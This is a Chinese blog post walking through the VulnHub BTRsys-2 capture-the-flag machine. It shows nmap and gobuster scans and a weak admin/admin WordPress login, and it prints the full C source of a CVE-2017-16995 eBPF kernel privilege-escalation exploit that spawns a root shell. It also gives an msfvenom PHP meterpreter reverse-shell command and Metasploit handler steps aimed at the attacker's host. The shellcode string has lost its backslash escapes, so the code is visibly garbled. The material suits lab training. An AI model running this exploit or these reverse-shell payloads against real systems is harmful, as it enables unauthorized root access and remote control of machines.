BTRsys-2

最新推荐文章于 2022-12-02 10:42:53 发布
最新推荐文章于 2022-12-02 10:42:53 发布
阅读量441 收藏
点赞数
文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42307546/article/details/121151656
版权

nmap对目标进行扫描

nmap -A -p 80,21,22 -oA BTR.log
Starting Nmap 7.80 ( https://nmap.org ) at 2021-11-04 00:16 CST
WARNING: No targets were specified, so 0 hosts scanned.
Nmap done: 0 IP addresses (0 hosts up) scanned in 1.24 seconds
root@kali:~/BTRsys-2# nmap -A -p 80,21,22 192.168.159.131 -oA BTR.log
Starting Nmap 7.80 ( https://nmap.org ) at 2021-11-04 00:17 CST
Nmap scan report for 192.168.159.131
Host is up (0.0014s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.159.128
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 08:ee:e3:ff:31:20:87:6c:12:e7:1c:aa:c4:e7:54:f2 (RSA)
| 256 ad:e1:1c:7d:e7:86:76:be:9a:a8:bd:b9:68:92:77:87 (ECDSA)
| 256 0c:e1:eb:06:0c:5c:b5:cc:1b:d1:fa:56:06:22:31:67 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_Hackers
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn’t have a title (text/html).
MAC Address: 00:0C:29:27:48:F5 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

对80端口进行目录扫描
root@kali:~/BTRsys-2# gobuster dir -u http://192.168.159.131 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 -x php,bak,rar,zip

Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

[+] Url: http://192.168.159.131
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,bak,rar,zip
[+] Timeout: 10s

2021/11/04 00:23:19 Starting gobuster in directory enumeration mode

/upload (Status: 301) [Size: 319] [–> http://192.168.159.131/upload/]
/wordpress (Status: 301) [Size: 322] [–> http://192.168.159.131/wordpress/]
/javascript (Status: 301) [Size: 323] [–> http://192.168.159.131/javascript/]
/INSTALL (Status: 200) [Size: 1241]
/LICENSE (Status: 200) [Size: 1672]
/COPYING (Status: 200) [Size: 35147]
/CHANGELOG (Status: 200) [Size: 224]
/server-status (Status: 403) [Size: 303]

发现一个为wordpress的页面扫描它的后台为wp-admin
直接尝试admin admin弱口令登录进入后台
在这里插入图片描述
wordpress getshell方法
https://www.jianshu.com/p/ffdbc362b69a
查看内核版本在这里插入图片描述

使用cve-2017-16995

/*
 * Ubuntu 16.04.4 kernel priv esc
 *
 * all credits to @bleidl
 * - vnik
 */

// Tested on:
// 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64
// if different kernel adjust CRED offset + check kernel stack size
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <string.h>
#include <linux/bpf.h>
#include <linux/unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/stat.h>
#include <stdint.h>

#define PHYS_OFFSET 0xffff880000000000
#define CRED_OFFSET 0x5f8
#define UID_OFFSET 4
#define LOG_BUF_SIZE 65536
#define PROGSIZE 328

int sockets[2];
int mapfd, progfd;

char *__prog = 	"xb4x09x00x00xffxffxffxff"
		"x55x09x02x00xffxffxffxff"
		"xb7x00x00x00x00x00x00x00"
		"x95x00x00x00x00x00x00x00"
		"x18x19x00x00x03x00x00x00"
		"x00x00x00x00x00x00x00x00"
		"xbfx91x00x00x00x00x00x00"
		"xbfxa2x00x00x00x00x00x00"
		"x07x02x00x00xfcxffxffxff"
		"x62x0axfcxffx00x00x00x00"
		"x85x00x00x00x01x00x00x00"
		"x55x00x01x00x00x00x00x00"
		"x95x00x00x00x00x00x00x00"
		"x79x06x00x00x00x00x00x00"
		"xbfx91x00x00x00x00x00x00"
		"xbfxa2x00x00x00x00x00x00"
		"x07x02x00x00xfcxffxffxff"
		"x62x0axfcxffx01x00x00x00"
		"x85x00x00x00x01x00x00x00"
		"x55x00x01x00x00x00x00x00"
		"x95x00x00x00x00x00x00x00"
		"x79x07x00x00x00x00x00x00"
		"xbfx91x00x00x00x00x00x00"
		"xbfxa2x00x00x00x00x00x00"
		"x07x02x00x00xfcxffxffxff"
		"x62x0axfcxffx02x00x00x00"
		"x85x00x00x00x01x00x00x00"
		"x55x00x01x00x00x00x00x00"
		"x95x00x00x00x00x00x00x00"
		"x79x08x00x00x00x00x00x00"
		"xbfx02x00x00x00x00x00x00"
		"xb7x00x00x00x00x00x00x00"
		"x55x06x03x00x00x00x00x00"
		"x79x73x00x00x00x00x00x00"
		"x7bx32x00x00x00x00x00x00"
		"x95x00x00x00x00x00x00x00"
		"x55x06x02x00x01x00x00x00"
		"x7bxa2x00x00x00x00x00x00"
		"x95x00x00x00x00x00x00x00"
		"x7bx87x00x00x00x00x00x00"
		"x95x00x00x00x00x00x00x00";

char bpf_log_buf[LOG_BUF_SIZE];

static int bpf_prog_load(enum bpf_prog_type prog_type,
		  const struct bpf_insn *insns, int prog_len,
		  const char *license, int kern_version) {
	union bpf_attr attr = {
		.prog_type = prog_type,
		.insns = (__u64)insns,
		.insn_cnt = prog_len / sizeof(struct bpf_insn),
		.license = (__u64)license,
		.log_buf = (__u64)bpf_log_buf,
		.log_size = LOG_BUF_SIZE,
		.log_level = 1,
	};

	attr.kern_version = kern_version;

	bpf_log_buf[0] = 0;

	return syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
}

static int bpf_create_map(enum bpf_map_type map_type, int key_size, int value_size,
		   int max_entries) {
	union bpf_attr attr = {
		.map_type = map_type,
		.key_size = key_size,
		.value_size = value_size,
		.max_entries = max_entries
	};

	return syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));
}

static int bpf_update_elem(uint64_t key, uint64_t value) {
	union bpf_attr attr = {
		.map_fd = mapfd,
		.key = (__u64)&key,
		.value = (__u64)&value,
		.flags = 0,
	};

	return syscall(__NR_bpf, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr));
}

static int bpf_lookup_elem(void *key, void *value) {
	union bpf_attr attr = {
		.map_fd = mapfd,
		.key = (__u64)key,
		.value = (__u64)value,
	};

	return syscall(__NR_bpf, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr));
}

static void __exit(char *err) {
	fprintf(stderr, "error: %s
", err);
	exit(-1);
}

static void prep(void) {
	mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), sizeof(long long), 3);
	if (mapfd < 0)
		__exit(strerror(errno));

	progfd = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER,
			(struct bpf_insn *)__prog, PROGSIZE, "GPL", 0);

	if (progfd < 0)
		__exit(strerror(errno));

	if(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets))
		__exit(strerror(errno));

	if(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0)
		__exit(strerror(errno));
}

static void writemsg(void) {
	char buffer[64];

	ssize_t n = write(sockets[0], buffer, sizeof(buffer));

	if (n < 0) {
		perror("write");
		return;
	}
	if (n != sizeof(buffer))
		fprintf(stderr, "short write: %lu
", n);
}

#define __update_elem(a, b, c) 
	bpf_update_elem(0, (a)); 
	bpf_update_elem(1, (b)); 
	bpf_update_elem(2, (c)); 
	writemsg();

static uint64_t get_value(int key) {
	uint64_t value;

	if (bpf_lookup_elem(&key, &value))
		__exit(strerror(errno));

	return value;
}

static uint64_t __get_fp(void) {
	__update_elem(1, 0, 0);

	return get_value(2);
}

static uint64_t __read(uint64_t addr) {
	__update_elem(0, addr, 0);

	return get_value(2);
}

static void __write(uint64_t addr, uint64_t val) {
	__update_elem(2, addr, val);
}

static uint64_t get_sp(uint64_t addr) {
	return addr & ~(0x4000 - 1);
}

static void pwn(void) {
	uint64_t fp, sp, task_struct, credptr, uidptr;

	fp = __get_fp();
	if (fp < PHYS_OFFSET)
		__exit("bogus fp");
	
	sp = get_sp(fp);
	if (sp < PHYS_OFFSET)
		__exit("bogus sp");
	
	task_struct = __read(sp);

	if (task_struct < PHYS_OFFSET)
		__exit("bogus task ptr");

	printf("task_struct = %lx
", task_struct);

	credptr = __read(task_struct + CRED_OFFSET); // cred

	if (credptr < PHYS_OFFSET)
		__exit("bogus cred ptr");

	uidptr = credptr + UID_OFFSET; // uid
	if (uidptr < PHYS_OFFSET)
		__exit("bogus uid ptr");

	printf("uidptr = %lx
", uidptr);
	__write(uidptr, 0); // set both uid and gid to 0

	if (getuid() == 0) {
		printf("spawning root shell
");
		system("/bin/bash");
		exit(0);
	}

	__exit("not vulnerable?");
}

int main(int argc, char **argv) {
	prep();
	pwn();

	return 0;
}

下载地址:https://github.com/Al1ex/CVE-2017-16995/blob/master/exploit.c
直接在kali下编译好在上传

kali生成反弹php shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.159.128 LPORT=5555 R > test3.php

1 使用handler模块

msf > use exploit/multi/handler

2 设置payload

msf exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp(当时windows时php换成windows)

PAYLOAD =>php/meterpreter/reverse_tcp

3 设置监听主机

msfexploit(multi/handler) > set LHOST 192.168.159.128

4 设置监听端口(默认4444)

msfexploit(multi/handler) > set LPORT 5555

LPORT => 5555

5 发动攻击

msfexploit(multi/handler) > exploit

成功反弹执行exp得到root权限

qq_42307546
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
靶机渗透——BTRsys1
1匹黑马
02-23 1672
文章目录任务环境信息收集漏洞挖掘漏洞利用权限获取权限提升 任务环境 攻击机:Kali2019 靶机:BRTsys1 涉及知识点:代码审计、目录遍历、文件上传、脏牛提权 信息收集 还是老样子先进行信息收集: arp-scan -l #扫描内网存活主机 接着扫一下开放的端口与版本信息 nmap -sV -O 192.168.1.116 开放了22、80端口,话不多说,直接扫一下Web页面...
vulnhub:BTRSys2
cjstang的博客
06-18 2363
OSCP-3:主要利用方式:wordpress账号密码破解+PHP马反弹shell+系统内核低版本提权
Vulnhub-Btrsys-2靶机实战
御七彩虹猫
04-18 2758
Vulnhub-Btrsys-2靶机实战
VulnHub BTRsys-2 进行渗透测试的总结与过程
Ba1_Ma0的博客
03-03 746
BTRsys-2 主机发现 用netdiscover工具进行内网主机发现。 Netdiscover简介:专用的二层发现工具。拥有主动和被动发现两种方式。 我使用以下命令: netdiscover -i eth0 命令解释: -i:网卡,选择你监控的网卡。比如eth0。 如图: 工具执行后内容: 只有192.168.1.105是未知ip,所以这就是目标主机的ip地址 扫描/信息搜集 我使用nmap对目标主机扫描,好获取更多关于目标主机的信息,你扫描获取的信息决定了你之后能尝试的方向,多花点时间进行信
BTRSys: v1靶机
小小猪的博客
06-08 747
BTRSys: v1靶机 靶机地址:https://www.vulnhub.com/entry/btrsys-v1,195/ 靶机难度:初级/中级 arp-scan -l 扫描获取靶机ip:x.x.x.229 nmap -sV -Pn -A x.x.x.229 扫描出80,22,21端口 dirb http://x.x.x.229 -X .php 扫描出config.php,login.php 登录,弱口令,不成功 查看源码 substring就是截取,...
Vulnhub-CTF-Writeups:此备忘单针对CTF玩家和初学者,以帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章
05-28
Vulnhub-CTF-Writeups 该备忘单针对CTF玩家和初学者,可帮助他们对Vulnhub实验室...BTRSys:DV 2.1 BTRSys 1 难以置信地容易 狄娜 Born2Root G0rmint 基本渗透 BSides Vancuver:2018年 Toppo:1 Billu Box 2 基
CTF-Difficulty:此备忘单旨在面向CTF玩家和初学者,帮助他们根据难度对CTF挑战进行分类
05-28
CTF难度表(Vulnhub) 此备忘单针对CTF玩家和初学者,可帮助他们根据他们的难度对Vulnhub...1 VulnOS:2.0 新鲜地塞德纳恶梦奥库斯比卢:B0x 莫里亚1.1 Lazysys管理员斗牛犬BTRSys:DV 2.1 BTRSys 1 难以置信地容易狄娜
BTRSYS 2.1 WALKTHROUGH
weixin_41082546的博客
08-11 403
BTRSys 2.1 https://www.vulnhub.com/entry/btrsys-v21,196/ 1.确定目标ip 2.端口和服务探测 根据vsftp版本没有找到相关漏洞利用代码 然后我们转战web 查看页面代码,前端源代码中也没有什么有意义的东西 nikto -h 192.168.88.199 发现在robots.txt 文件中 存在 wo...
BTRSys:v2.1靶机
小小猪的博客
06-07 429
BTRSys:v2.1靶机 主机扫描,arp-scan -l nmap -sV -pN -A x.x.x.228,发现80,21,22端口 dirb http://x.x.x.228,发现网站是wordpress搭建的 用wpscan枚举用户和插件,找到了两个用户btrisk和admin wpscan --url http://x.x.x.228/wordpress -e u vp 爆破出用户admin的密码admin wpscan --url http://x.x.x
vulnhub BTRSys: v2.1
箭雨镜屋
08-30 552
渗透思路:nmap扫描端口 ---- gobuster扫描网站目录 ---- wpscan扫描wordpress用户名并爆破密码 ---- 利用WordPress的模板编辑功能getshell ---- wordpress配置文件泄露数据库用户名密码 ---- 数据库泄露btrisk用户的密码 ---- sudo su提权...
靶机练习之Billu_b0x
10-04
通过该靶场,能够初步了解web渗透的基本流程。小白在了解了web各种漏洞原理,之后,可以练习一下该靶场,靶场做法很多。我也是一个小白,来这里记录一下学习的过程,不喜勿喷!!!感谢!!!
Nmap扫描教程之DNS服务类
大学霸__IT达人
06-25 8032
Nmap扫描教程之DNS服务类
ctf:kali工具wireshark,nmap
最新发布
viviliving的专栏
12-02 1004
wireshark得在视窗里打开。
nmap安装和使用
java技术博客
07-26 997
kali和ubuntu默写版本已经预先安装了nmap。centos7.x安装nmap。
探测工具nmap简介及使用说明
晴空的博客
11-07 1628
Nmap(Nmap是"Network Mapper"的缩写)是一款免费开源的网络探测和安全审核工具
Nmap扫描教程之网络基础服务DHCP服务类
大学霸__IT达人
06-25 4913
Nmap扫描教程之网络基础服务DHCP服务类
MATRIX: 1 ctf challenge
32bin的博客
11-25 3829
MATRIX: 1 About Release Back to the Top Name: Matrix: 1 Date release: 19 Aug 2018 Author: Ajay Verma Series: Matrix Download Back to the Top Please remember that VulnHub is a free community resource so we are unable to check the machines that are pr
CTF之BTRSys v2.1 靶机渗透(wordpress 404页面上传webshell)
afei001
04-02 1168
练习环境     攻击机:kali     靶机:BTRSys: v2.1 下载地址:https://download.vulnhub.com/btrsys/BTRSys2.1.rar 1.发现靶机,进行端口扫描 root@afei:~# ifconfig eth0 eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500...
【vulnhub】BTRsys-2 靶机
Nicky_Zheng的博客
01-29 1218
1、信息收集 1.1、端口扫描 使用netdiscor或arp获取到靶机 ip:192.168.57.137 使用nmap获取端口信息 kali@kali:~$ sudo nmap -sSV -T4 -p 1-65535 -Pn -n 192.168.57.137 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( http
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值